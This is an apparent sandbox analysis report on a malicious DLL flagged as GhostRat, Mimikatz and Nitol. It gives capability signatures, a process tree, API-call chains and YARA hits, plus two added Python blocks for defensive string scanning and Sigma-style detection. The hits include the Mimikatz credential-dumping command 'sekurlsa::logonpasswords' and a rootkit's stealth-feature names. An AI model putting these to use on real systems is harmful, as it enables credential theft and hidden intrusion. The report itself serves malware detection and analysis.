
Windows Analysis Report
ZfJheGhddq.dll

Overview

General Information

Sample name: ZfJheGhddq.dll (renamed because the original name is a hash value)
Original sample name: 57eff460128e65204d46aa5a0012f8ba4758fa76a74d9dabe5d4b4b0bd1b11cc.dll
Analysis ID: 1557655
MD5: 18ea526e9d1f36692776b2004cecd595
SHA1: 7d37805f3d1ffe9f43c599ae50dce96abf0a63c5
SHA256: 57eff460128e65204d46aa5a0012f8ba4758fa76a74d9dabe5d4b4b0bd1b11cc
Tags: 103-45-64-91, dll, user-JAMESWT_MHT

Detection

GhostRat, Mimikatz, Nitol
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GhostRat
Yara detected Mimikatz
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contains functionality to automate explorer (e.g. start an application)
Contains functionality to capture and log keystrokes
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Contains functionality to modify windows services which are used for security filtering and protection
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create new users
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 1568 cmdline: loaddll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2688 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6908 cmdline: rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 3644 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6524 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 4268 cmdline: rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,Shellex MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 7048 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4808 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Mimikatz
Description: Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks. Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
Attribution:
  • APT32
  • Anunak
  • GALLIUM
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

Name: Nitol
Description: (none listed)
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol
No configs have been found
Source: ZfJheGhddq.dll | Rule: JoeSecurity_GhostRat | Description: Yara detected GhostRat | Author: Joe Security
Source: ZfJheGhddq.dll | Rule: JoeSecurity_Nitol | Description: Yara detected Nitol | Author: Joe Security
Source: ZfJheGhddq.dll | Rule: JoeSecurity_Mimikatz_1 | Description: Yara detected Mimikatz | Author: Joe Security
Source: ZfJheGhddq.dll | Rule: Mimikatz_Strings | Description: Detects Mimikatz strings | Author: Florian Roth
  • 0x11fcaf:$x1: sekurlsa::logonpasswords
Source: ZfJheGhddq.dll | Rule: INDICATOR_TOOL_RTK_HiddenRootKit | Description: Detects the Hidden public rootkit | Author: ditekSHen
  • 0x10444a:$h1: Hid_State
  • 0x1169b0:$h1: Hid_State
  • 0x10445e:$h2: Hid_StealthMode
  • 0x1169d0:$h2: Hid_StealthMode
  • 0x10447e:$h3: Hid_HideFsDirs
  • 0x1169f0:$h3: Hid_HideFsDirs
  • 0x10449c:$h4: Hid_HideFsFiles
  • 0x116a10:$h4: Hid_HideFsFiles
  • 0x1044bc:$h5: Hid_HideRegKeys
  • 0x116a30:$h5: Hid_HideRegKeys
  • 0x1044dc:$h6: Hid_HideRegValues
  • 0x116a50:$h6: Hid_HideRegValues
  • 0x104500:$h7: Hid_IgnoredImages
  • 0x116a80:$h7: Hid_IgnoredImages
  • 0x104524:$h8: Hid_ProtectedImages
  • 0x116ab0:$h8: Hid_ProtectedImages
  • 0x108d66:$s1: FLTMGR.SYS
  • 0x11c6da:$s1: FLTMGR.SYS
  • 0x1092e2:$s2: HAL.dll
  • 0x105e86:$s3: \SystemRoot\System32\csrss.exe
  • 0x118630:$s3: \SystemRoot\System32\csrss.exe
(1 additional match not shown on this page)
Source: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Mimikatz_1 | Description: Yara detected Mimikatz | Author: Joe Security
Source: 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Mimikatz_1 | Description: Yara detected Mimikatz | Author: Joe Security
Source: 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Mimikatz_1 | Description: Yara detected Mimikatz | Author: Joe Security
Source: Process Memory Space: loaddll32.exe PID: 1568 | Rule: JoeSecurity_Mimikatz_1 | Description: Yara detected Mimikatz | Author: Joe Security
Source: Process Memory Space: rundll32.exe PID: 4268 | Rule: JoeSecurity_Mimikatz_1 | Description: Yara detected Mimikatz | Author: Joe Security
(1 additional match not shown on this page)
Source: 0.2.loaddll32.exe.100fbd38.2.unpack | Rule: INDICATOR_TOOL_RTK_HiddenRootKit | Description: Detects the Hidden public rootkit | Author: ditekSHen
  • 0x7b12:$h1: Hid_State
  • 0x7b26:$h2: Hid_StealthMode
  • 0x7b46:$h3: Hid_HideFsDirs
  • 0x7b64:$h4: Hid_HideFsFiles
  • 0x7b84:$h5: Hid_HideRegKeys
  • 0x7ba4:$h6: Hid_HideRegValues
  • 0x7bc8:$h7: Hid_IgnoredImages
  • 0x7bec:$h8: Hid_ProtectedImages
  • 0xc42e:$s1: FLTMGR.SYS
  • 0xc9aa:$s2: HAL.dll
  • 0x954e:$s3: \SystemRoot\System32\csrss.exe
  • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
  • 0x258:$s5: INIT
  • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
Source: 3.2.rundll32.exe.1010b380.1.raw.unpack | Rule: INDICATOR_TOOL_RTK_HiddenRootKit | Description: Detects the Hidden public rootkit | Author: ditekSHen
  • 0xb630:$h1: Hid_State
  • 0xb650:$h2: Hid_StealthMode
  • 0xb670:$h3: Hid_HideFsDirs
  • 0xb690:$h4: Hid_HideFsFiles
  • 0xb6b0:$h5: Hid_HideRegKeys
  • 0xb6d0:$h6: Hid_HideRegValues
  • 0xb700:$h7: Hid_IgnoredImages
  • 0xb730:$h8: Hid_ProtectedImages
  • 0x1135a:$s1: FLTMGR.SYS
  • 0xd2b0:$s3: \SystemRoot\System32\csrss.exe
  • 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
Source: 4.2.rundll32.exe.1010b380.2.unpack | Rule: INDICATOR_TOOL_RTK_HiddenRootKit | Description: Detects the Hidden public rootkit | Author: ditekSHen
  • 0xaa30:$h1: Hid_State
  • 0xaa50:$h2: Hid_StealthMode
  • 0xaa70:$h3: Hid_HideFsDirs
  • 0xaa90:$h4: Hid_HideFsFiles
  • 0xaab0:$h5: Hid_HideRegKeys
  • 0xaad0:$h6: Hid_HideRegValues
  • 0xab00:$h7: Hid_IgnoredImages
  • 0xab30:$h8: Hid_ProtectedImages
  • 0xfb5a:$s1: FLTMGR.SYS
  • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
  • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
Source: 3.2.rundll32.exe.1010b380.1.unpack | Rule: INDICATOR_TOOL_RTK_HiddenRootKit | Description: Detects the Hidden public rootkit | Author: ditekSHen
  • 0xaa30:$h1: Hid_State
  • 0xaa50:$h2: Hid_StealthMode
  • 0xaa70:$h3: Hid_HideFsDirs
  • 0xaa90:$h4: Hid_HideFsFiles
  • 0xaab0:$h5: Hid_HideRegKeys
  • 0xaad0:$h6: Hid_HideRegValues
  • 0xab00:$h7: Hid_IgnoredImages
  • 0xab30:$h8: Hid_ProtectedImages
  • 0xfb5a:$s1: FLTMGR.SYS
  • 0xc6b0:$s3: \SystemRoot\System32\csrss.exe
  • 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
Source: 3.2.rundll32.exe.100fbd38.2.unpack | Rule: INDICATOR_TOOL_RTK_HiddenRootKit | Description: Detects the Hidden public rootkit | Author: ditekSHen
  • 0x7b12:$h1: Hid_State
  • 0x7b26:$h2: Hid_StealthMode
  • 0x7b46:$h3: Hid_HideFsDirs
  • 0x7b64:$h4: Hid_HideFsFiles
  • 0x7b84:$h5: Hid_HideRegKeys
  • 0x7ba4:$h6: Hid_HideRegValues
  • 0x7bc8:$h7: Hid_IgnoredImages
  • 0x7bec:$h8: Hid_ProtectedImages
  • 0xc42e:$s1: FLTMGR.SYS
  • 0xc9aa:$s2: HAL.dll
  • 0x954e:$s3: \SystemRoot\System32\csrss.exe
  • 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
  • 0x258:$s5: INIT
  • 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
(25 additional matches not shown on this page)
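The match lists above give, for each YARA string, the file or dump offset where it was found. The following is an added example by the editor (not Joe Sandbox or YARA code) that reproduces that "offset:$id: string" evidence format with a plain-Python scanner over a constructed test image. The string set is the Hidden-rootkit and Mimikatz indicators quoted in this report; the two rule conditions are assumptions for illustration and only approximate the real INDICATOR_TOOL_RTK_HiddenRootKit and Mimikatz_Strings rules.

```python
"""
Plain-Python reproduction of the "offset:$id: string" evidence format used in
the YARA match lists above. Added example, not Joe Sandbox or YARA code. The
string set is the Hidden-rootkit and Mimikatz indicators quoted in this report;
the rule conditions are assumptions for illustration, not the rule authors' own.
"""

HIDDEN_STRINGS = {
    "$h1": b"Hid_State", "$h2": b"Hid_StealthMode", "$h3": b"Hid_HideFsDirs",
    "$h4": b"Hid_HideFsFiles", "$h5": b"Hid_HideRegKeys", "$h6": b"Hid_HideRegValues",
    "$h7": b"Hid_IgnoredImages", "$h8": b"Hid_ProtectedImages",
    "$s1": b"FLTMGR.SYS", "$s3": b"\\SystemRoot\\System32\\csrss.exe",
    "$s6": b"\\hidden-master\\Debug\\QAssist.pdb",
}
MIMIKATZ_STRINGS = {"$x1": b"sekurlsa::logonpasswords"}

def hidden_condition(hits):
    """Assumed condition: all eight Hid_* strings plus at least two $s strings."""
    return all(f"$h{i}" in hits for i in range(1, 9)) and \
        sum(1 for k in hits if k.startswith("$s")) >= 2

def mimikatz_condition(hits):
    """Assumed condition: the single module-command string is enough."""
    return "$x1" in hits

# rule name -> (strings, condition); names marked as approximations of the real rules
RULES = {
    "HiddenRootKit_strings": (HIDDEN_STRINGS, hidden_condition),
    "Mimikatz_strings": (MIMIKATZ_STRINGS, mimikatz_condition),
}

def find_all(buf, needle):
    """Every offset of needle in buf (overlapping occurrences included)."""
    offs, i = [], buf.find(needle)
    while i != -1:
        offs.append(i)
        i = buf.find(needle, i + 1)
    return offs

def scan(buf, rules=RULES):
    """Return {rule name: [(offset, id, string), ...]} for each rule whose condition holds."""
    report = {}
    for name, (strings, condition) in rules.items():
        hits = {sid: find_all(buf, s) for sid, s in strings.items()}
        hits = {sid: offs for sid, offs in hits.items() if offs}
        if condition(hits):
            report[name] = sorted((o, sid, strings[sid].decode("ascii"))
                                  for sid, offs in hits.items() for o in offs)
    return report

def format_hits(report):
    """Render matches the way the report lists them."""
    lines = []
    for name, hits in report.items():
        lines.append(name)
        lines.extend(f"  • 0x{off:x}:{sid}: {s}" for off, sid, s in hits)
    return "\n".join(lines)

def build_sample():
    """Constructed test image: 0x100 bytes of padding, then each indicator in a 0x40-byte slot."""
    blob = bytearray(b"MZ" + b"\x00" * 0xFE)
    for s in list(HIDDEN_STRINGS.values()) + list(MIMIKATZ_STRINGS.values()):
        blob += s.ljust(0x40, b"\x00")
    return bytes(blob)

if __name__ == "__main__":
    print(format_hits(scan(build_sample())))
```

Offsets reported by `scan` are file offsets into whatever buffer is passed in, which is why the same string shows different offsets in the sample file and in the unpacked memory regions listed above: each unpacked region is scanned as its own buffer.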

System Summary

Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 3644, TargetFilename: C:\Users\Public\Documents\MM
No Suricata rule has matched
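The Sigma hit above (Sysmon EventID 11, cmd.exe PID 3644 writing under C:\Users\Public) and the process-tree chain it comes from (rundll32.exe spawning `cmd /c md C:\Users\Public\Documents\MM`) can be expressed as two small detection checks. The following is an added example by the editor, not Joe Sandbox or Sigma code: the event records are constructed to mirror the process tree in this report, and the image and folder lists only approximate the public Sigma rule (they are assumptions).

```python
r"""
Two Sigma-style checks for the behaviour recorded above: a shell host (cmd.exe)
creating a directory under C:\Users\Public (the Sysmon EventID 11 hit) and
rundll32.exe spawning that cmd.exe. Added example, not Joe Sandbox or Sigma code.
The event records are constructed to mirror the report's process tree; the image
and folder lists approximate the public Sigma rule and are assumptions.
"""
import fnmatch

# Shell/scripting hosts that should not normally write into shared folders
# (assumed approximation of the public rule's image list).
SHELL_IMAGES = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe")

# Shared, world-writable folders treated as suspicious write targets (assumption).
SUSPICIOUS_FOLDERS = (r"C:\Users\Public\*", r"C:\Windows\Temp\*",
                      r"C:\ProgramData\*", r"C:\PerfLogs\*")

# Constructed Sysmon-like events: PIDs and command lines taken from the report's
# process tree (image paths assumed), plus one benign file write as a control.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 6908, "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1'},
    {"EventID": 1, "ProcessId": 3644, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"cmd /c md C:\Users\Public\Documents\MM"},
    {"EventID": 11, "ProcessId": 3644, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "TargetFilename": r"C:\Users\Public\Documents\MM"},
    {"EventID": 11, "ProcessId": 4100, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\Documents\notes.txt"},
]

def basename(path):
    """Last path component, lower-cased, for case-insensitive image comparison."""
    return path.rsplit("\\", 1)[-1].lower()

def rule_shell_write_to_suspicious_folder(ev):
    """EventID 11: a shell/scripting host creates a file or directory in a shared folder."""
    if ev.get("EventID") != 11:
        return False
    if basename(ev.get("Image", "")) not in SHELL_IMAGES:
        return False
    target = ev.get("TargetFilename", "").lower()
    return any(fnmatch.fnmatchcase(target, pat.lower()) for pat in SUSPICIOUS_FOLDERS)

def rule_rundll32_spawns_cmd_md_public(ev):
    """EventID 1: rundll32.exe spawns cmd.exe whose command line makes a directory under C:\\Users\\Public."""
    if ev.get("EventID") != 1:
        return False
    if basename(ev.get("ParentImage", "")) != "rundll32.exe":
        return False
    if basename(ev.get("Image", "")) != "cmd.exe":
        return False
    cl = ev.get("CommandLine", "").lower()
    return " md " in cl and "c:\\users\\public\\" in cl

RULES = {
    "Windows Shell/Scripting Application File Write to Suspicious Folder":
        rule_shell_write_to_suspicious_folder,
    "rundll32 spawning cmd to create a directory under C:\\Users\\Public":
        rule_rundll32_spawns_cmd_md_public,
}

def run_rules(events):
    """Return (rule name, ProcessId) for every event that triggers a rule."""
    hits = []
    for ev in events:
        for name, fn in RULES.items():
            if fn(ev):
                hits.append((name, ev["ProcessId"]))
    return hits

if __name__ == "__main__":
    for name, pid in run_rules(SAMPLE_EVENTS):
        print(f"[PID {pid}] {name}")
```

Both checks fire on PID 3644 and neither on the explorer.exe control event; the second check is narrower than the Sigma rule and exists to tie the file write back to the rundll32 parent that the process tree shows.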


AV Detection

Source: ZfJheGhddq.dll | Avira: detected
Source: ZfJheGhddq.dll | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 92.2% probability
Source: ZfJheGhddq.dll | Joe Sandbox ML: detected
Source: ZfJheGhddq.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: Binary string: F:\hidden-master\x64\Debug\QAssist.pdb | source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll
Source: Binary string: rundll32.pdb | source: rundll32.exe, 00000003.00000002.4027805864.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.3.dr
Source: Binary string: rundll32.pdbGCTL | source: rundll32.exe, 00000003.00000002.4027805864.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.3.dr
Source: Binary string: F:\hidden-master\Debug\QAssist.pdb | source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,0_2_100254C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100254C0 wcstombs,NetUserEnum,wcstombs,NetApiBufferFree,NetApiBufferFree,LocalAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalReAlloc,3_2_100254C0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,0_2_10009080
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_100092A0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,0_2_100097D0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,0_2_1002AB10
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10009B60 FindFirstFileA,FindClose,FindClose,0_2_10009B60
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,0_2_10009C40
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,0_2_1000BD50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,3_2_10009080
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_100092A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,3_2_100097D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,3_2_1002AB10
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009B60 FindFirstFileA,FindClose,FindClose,3_2_10009B60
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,3_2_10009C40
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000BD50 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825,3_2_1000BD50
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10008E50 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlenA,lstrlenA,lstrlenA,GetVolumeInformationA,SHGetFileInfoA,lstrlenA,lstrlenA,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlenA,0_2_10008E50
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 0_2_1002E040
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then test byte ptr [101218B4h], 00000008h | 0_2_1003E318
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movdqa dqword ptr [edi], xmm7 | 0_2_1003E490
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 3_2_1002E040
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then test byte ptr [101218B4h], 00000008h | 3_2_1003E318
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then movdqa dqword ptr [edi], xmm7 | 3_2_1003E490
